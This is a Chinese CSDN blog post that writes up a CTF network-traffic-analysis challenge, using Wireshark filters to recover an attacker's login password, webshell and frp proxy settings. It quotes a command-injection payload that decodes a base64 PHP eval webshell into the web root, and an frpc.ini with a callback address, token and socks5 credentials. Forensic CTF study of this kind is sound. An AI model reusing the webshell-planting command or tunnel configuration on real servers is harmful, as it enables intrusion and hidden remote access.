CTF流量分析

最新推荐文章于 2024-06-13 17:21:40 发布
最新推荐文章于 2024-06-13 17:21:40 发布
阅读量276 收藏 3
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kiber_/article/details/137965032
版权

一次CTF流量分析比赛的题解记录。

题目一:找到攻击者登录成功记录,并对密码计算md5,示意:md5(password),提交32位md5值为flag

思路:http.request.method =="POST" && http contains "php"点击第一个,查看到密码:

题目二:找到攻击者上传WebShell路径,并计算路径的md5,示意:md5(password),提交32位md5值为flag

思路:http.request.method =="POST" && http contains "php",追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php')

题目三:找到攻击者使用的WebShell,并对WebShell密码计算md5,示意:md5(password),提交32位md5值为flag

题目四:黑客上传的代理工具的回连地址端口,并对地址端口计算md5,示意:md5(10.10.10.10:8080),提交32位md5值为flag

思路:先找使用了什么代理工具,再查看代理工具配置文件。http.request.method =="POST" && http contains "php",可以看出使用的代理工具为frp,接下来继续追踪流找frpc.ini文件内容,看写入了什么。

找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件

找到后,解密后面的16进输入。

[common] server_addr = 192.168.157.111 server_port = 8888 token=fY4e3vcrSYAHjjFKzKK8

题目五:黑客上传的代理工具socks5的账号密码,并计算账号、密码的md5,示意:md5(username#password),提交32位md5值为flag

[test_sock5] type = tcp remote_port =8111 plugin = socks5 plugin_user = PxpYxFBdNp7 plugin_passwd = YEDSunpH use_encryption = true use_compression = true

Kiberrr
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
两道CTF流量分析,寻找flag!
03-10
目1:在流量中寻找管理员的密码!...问1:安全审计设备上捕获了一条OPC流量,疑似遭遇黑客攻击,请分析出黑客攻击的流量编号。(仅需找到流量编号即可) 问2:找出藏匿在流量包中的flag(格式为flag{})
CTF流量分析经典例详解
qq_68163788的博客
01-03 2093
CTF(Capture The Flag)流量分析是网络安全竞赛中的重要环节,通过分析网络数据包来解决问。经典例包括网络流量分析、协议分析、恶意代码分析等。举例来说,一道经典的CTF流量分析目可能是给定一个pcap文件,要求分析其中的数据包,找出隐藏的信息或者发现异常行为。参赛者需要使用网络分析工具如Wireshark或tcpdump来分析数据包,识别各种协议如HTTP、FTP、DNS等,并根据特定的任务要求提取关键信息。另外,恶意代码分析也是CTF中常见的型,参赛者需要分析给定的恶意代码样本
【玄机】-----应急响应
m0_63138919的博客
05-13 1681
玄机应急响应 解 一起学习
CTF流量解http1.pcapng
catch
08-08 1525
里面包含了flag。
CTF Misc(3)流量分析基础以及原理
Ba1_Ma0的博客
10-11 3253
流量分析基础以及原理
一道冰蝎文件流量分析的例
09-01
一道冰蝎文件流量分析的例
启明HW-流量分析
04-24
本资源是启明星辰对于护网的考核目,主要是流量分析方面的实战目。
sql注入攻击流量情况
07-18
sql注入攻击流量情况
针对ctf线下赛流量抓取(php)+真实环境流量抓取分析的工具源码+项目说明.zip
01-30
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和...针对ctf线下赛流量抓取(php)+真实环境流量抓取分析的工具源码+项目说明.zip
网络安全管理组织架构复习
LongL_GuYu的博客
06-12 314
网络安全管理组织架构复习
网络安全练气篇——OWASP TOP 10
weixin_55762309的博客
06-13 503
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
网络安全 - ARP 欺骗原理+实验
z339521的博客
06-13 1003
APRAPR(Address Resolution Protocol)即地址解析协议,负责将某个 IP 地址解析成对应的 MAC 地址。在网络通信过程中会使用到这两种地址,逻辑 IP 地址和物理 MAC 地址,一般情况下,正常通信需要这两种地址协同工作。一个主机要和另一个主机进行直接通信,必须要知道目标主机的 MAC 地址。但这个目标 MAC 地址是如何获得的呢?就是需要通过 ARP 协议获得的。
【网络安全的神秘世界】web应用程序安全与风险
weixin_54750312的博客
06-05 1346
web攻击的本质,就是通过http协议篡改应用程序(永远不要相信用户的输入)可利用点:请求方法、请求头、请求体利用过程:认证、会话、授权弱口令强口令账号枚举认证不满足强口令条件密码长度至少8位包含大小写字母、数字、特殊字符中的至少3类密码和用户名无相关性尝试大量可能的账号名称,以找出系统中存在的有效账号为了密码爆破做准备,节省攻击时间判断下面属于什么口令:admin@123#1 --弱口令,与用户名相关。
【网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【一】
q742971636的博客
06-09 1304
Mininet: 主要用于创建和模拟虚拟网络拓扑,适合于网络实验和研究。Ryu: 主要用于开发和运行 SDN 控制器,用于管理和控制网络设备。这两个工具通常可以结合使用:使用 Mininet 模拟网络环境,使用 Ryu 作为 SDN 控制器来管理模拟网络中的设备和流量
提升网络安全韧性:从基础防护开始
最新发布
Dexun_chuqi的博客
06-13 344
网络安全韧性(Cyber Resilience)指的是在面对网络攻击或其他不利事件时,系统、网络和组织能够有效抵御、吸收和恢复正常功能的能力。这一概念不仅关注防止攻击的发生,还强调在攻击发生后,系统能够迅速恢复并继续运行。网络安全韧性包括预防、响应、恢复三个主要环节,旨在确保在面对各种潜在威胁时,网络能够保持其关键功能。提升网络安全韧性是一项系统性工程,涉及多个方面的综合管理和技术手段。
网络安全练气篇——Web与Http基础
weixin_55762309的博客
06-13 477
既然我们要学习 Web 安全,当然要简单的了解什么是 WebWeb 与现在与我们生活息息相关,上个网站浏览新闻,看个视频,或者说……(咳咳)。这其中涉及到几个基本的点,从通信,会接触到 URL,到协议,会接触到 HTTP,再到前后端的概念,前端即 HTML,CSS,JavaScript,三剑客。后端,即处理脚本语言,比如PHP,JAVA,python,SQL 等等,再细致的分还能分为很多,这是一个庞大的链路,我们先从简单的学起就好啦。那什么是 Web 呢?
网络安全练气篇——PHP编程语言基础
weixin_55762309的博客
06-13 723
(外文名:PHP:Hypertext Preprocessor,中文名:“超文本预处理器”) 是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛,主要适用于Web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用) 文档中去执行,执行效率比完全生成HTML标记的CGI要高许多,PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
【网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【二】
q742971636的博客
06-12 233
以通过 Alt+F2 然后输入 xterm 尝试打开xterm。这之后就可以用Ctrl+Alt+T打开新终端了。在之前的代码中,已经捕获到攻击流量并打印。
ctf流量分析套路
10-09
对于CTF流量分析,套路主要分为以下几种: 1. 分析协议字段: 在网络协议中,各个字段的含义和取值范围是固定的。通过对网络流量中协议字段的分析,可以得到很多有用的信息,如IP地址、端口、协议类型、数据包类型等等。 2. 分析协议特征: 不同的协议有不同的特征和规律,例如HTTP头部信息、DNS域名解析请求、SMTP邮件传输等等。通过对这些特征进行分析,可以发现一些隐藏的信息或异常情况。 3. 分析协议流: 通过对协议流的整体分析,可以找出其中的规律和异常情况,例如TCP连接的建立和断开、UDP数据包丢失、ICMP错误信息等等。这种方法需要对协议本身有深入的了解和实际操作经验。 4. 分析攻击特征: CTF比赛中有很多与安全相关的目,例如网络攻击、漏洞利用、密码破解等等。通过对攻击流量的分析,可以发现攻击者的意图、手段和目标,同时也可以学习到一些防御和应对的技巧。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值